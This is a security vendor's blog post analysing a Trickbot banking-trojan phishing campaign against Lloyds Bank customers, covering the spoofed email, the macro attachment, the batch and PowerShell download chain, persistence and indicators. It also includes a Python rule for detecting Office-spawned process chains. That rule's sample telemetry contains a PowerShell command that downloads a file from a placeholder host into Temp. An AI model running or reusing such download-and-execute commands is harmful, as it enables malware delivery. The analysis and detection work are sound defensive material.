Trickbot is back, new and improved, and is targeting customers of Lloyds Bank of the UK in a new phishing campaign. The malware deployed uses new techniques to make it even more difficult for the casual user to notice anything unusual when their browser session is hijacked, and their credentials and security codes are being stolen.

Stealing banking credentials using phishing attacks is nothing new, but Trickbot takes this to another level by showing the user the correct URL of the online bank and a legitimate SSL certificate, so the user sees nothing unusual. Most phishing pages may be carefully designed and look like the real deal, but they never have the correct URL. Here you will see no difference from your online banking page, because the URL is entirely correct, and therefore so is the SSL certificate.

Impersonating Lloyds Bank

A large number of spam e-mails were sent to UK online banking users this week falsely claiming to be from Lloyds Bank. The e-mails are well-produced HTML messages (example below), with the 'from' field showing as 'Lloyds Bank'. To give a sense of attack volume, in one short 25-minute window Cyren saw (and blocked) 75,000 of these emails for its customers.

Picture 1. Spoofed e-mail from Lloyds Bank

While the display name shows the sender as Lloyds Bank, a careful look at the sender address in this example shows that the e-mail is from lloydsbacs.co.uk, not lloydsbank.co.uk: a very similar domain which had only just been created. Most (but not all) of the emails are being sent from a Dutch IP (5.149.255.107), which is a previously known source of spam. This IP appears to host many malicious domains in addition to the domain used here (lloydsbacs.co.uk).

Picture 2. Close-up of address block

Shows Legitimate URL and SSL Certificates

As noted at the beginning, Trickbot takes the phishing of banking credentials to another level by showing the correct URL of the online bank and confirmation of a legitimate SSL certificate, so even more alert users who pay attention to these details will not see anything unusual.

Picture 3. lloydsbank.co.uk is displayed to the user

How It Works

The e-mail has an Excel document attached called IncomingBACs.xlsm. After the attachment is opened, Excel asks the user to enable editing and then to enable macros.

Picture 4. Enable Preview request

Picture 5. 'Enable Content' request for Macro

After the user presses the Enable Content button in Excel, the macro runs, creates a .bat file called Vrlhdf.bat in the user's Temp folder (%APPDATA%/Local/Temp) and runs it. The bat file launches PowerShell.exe, which downloads an executable under the name logo.png and stores it in the same folder as Qeggfkf.exe. The bat file has two different URLs from which logo.png can be downloaded, a redundancy in case one of them is taken down, we presume. After downloading the file, PowerShell runs Qeggfkf.exe.

Picture 6. Vrlhdf.bat

Qeggfkf.exe then creates a copy of itself under AppData/Roaming/winapp/ as Pdffeje.exe, creates an authroot certificate file in %TEMP%, creates a service update job in the Windows Task folder, and then starts the Pdffeje.exe process and terminates the Qeggfkf.exe process. Pdffeje.exe is the main TrickBot process.

Picture 7. The folder the Qeggfkf.exe creates

Picture 8. Pdffeje.exe process
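One way a defender can catch the execution chain described above (Excel spawning cmd.exe with a .bat in the user's Temp folder, then PowerShell downloading and running an executable from Temp) is to walk the process tree in endpoint telemetry. The example below is added here and is not Cyren's code; the Sysmon-style events, user name and download URL are constructed placeholders, and the rule is written more generally than this one sample: it flags any script host or Temp-folder executable descended from an Office application.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # Sysmon event 1 style process-creation record
# Constructed sample telemetry modelled on the chain described above; user name and URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\EXCEL.EXE", r'"EXCEL.EXE" C:\Users\alice\Downloads\IncomingBACs.xlsm'),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\Vrlhdf.bat"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/logo.png',"
              r"'C:\Users\alice\AppData\Local\Temp\Qeggfkf.exe')"),
    ProcEvent(400, 300, r"C:\Users\alice\AppData\Local\Temp\Qeggfkf.exe", "Qeggfkf.exe"),
    ProcEvent(500, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Process"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()
def office_ancestor(event, by_pid, max_depth=5):
    # Walk up the parent chain; return the first Office application found, or None.
    parent, depth = by_pid.get(event.ppid), 0
    while parent is not None and depth < max_depth:
        if basename(parent.image) in OFFICE_APPS:
            return basename(parent.image)
        parent, depth = by_pid.get(parent.ppid), depth + 1
    return None

def find_office_spawned_chains(events):
    """Flag script hosts and Temp-folder executables that descend from an Office app, with reasons."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        from_temp = bool(USER_TEMP_RE.search(e.image))
        if basename(e.image) not in SCRIPT_HOSTS and not from_temp:
            continue
        origin = office_ancestor(e, by_pid)
        if origin is None:
            continue  # PowerShell started by a user or admin, not by a document, is not flagged
        reasons = ["descended from " + origin]
        if from_temp or USER_TEMP_RE.search(e.cmdline):
            reasons.append("uses user Temp folder")
        if DOWNLOAD_RE.search(e.cmdline):
            reasons.append("download cradle in command line")
        alerts.append({"pid": e.pid, "image": basename(e.image), "reasons": reasons})
    return alerts
```

Run against the constructed events, the rule flags cmd.exe, powershell.exe and Qeggfkf.exe (all rooted in EXCEL.EXE) and leaves the stand-alone PowerShell session alone.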

Trickbot has an encoded configuration module in the resource section of its binary and is able to receive new modules from a list of controller domains.

Picture 9. The list of controller domains

Cyren detects this version of Trickbot as W32/TrickBot.E.

The sample analyzed (Pdffeje.exe) has MD5 f19e7ef1e82daab85cf1f4b23737e914.

For an overview on the phishing phenomenon, download Cyren's special threat report on phishing.

Cyren Ltd. published this content on 14 August 2017 and is solely responsible for the information contained herein.
Distributed by Public, unedited and unaltered, on 14 August 2017 22:16:08 UTC.

Original document: https://blog.cyren.com/articles/trickbot-banking-trojan-making-phishing-more-real

Public permalink: http://www.publicnow.com/view/542CA37EC96C5FAD2C585CE8E7E9A472C1640B1D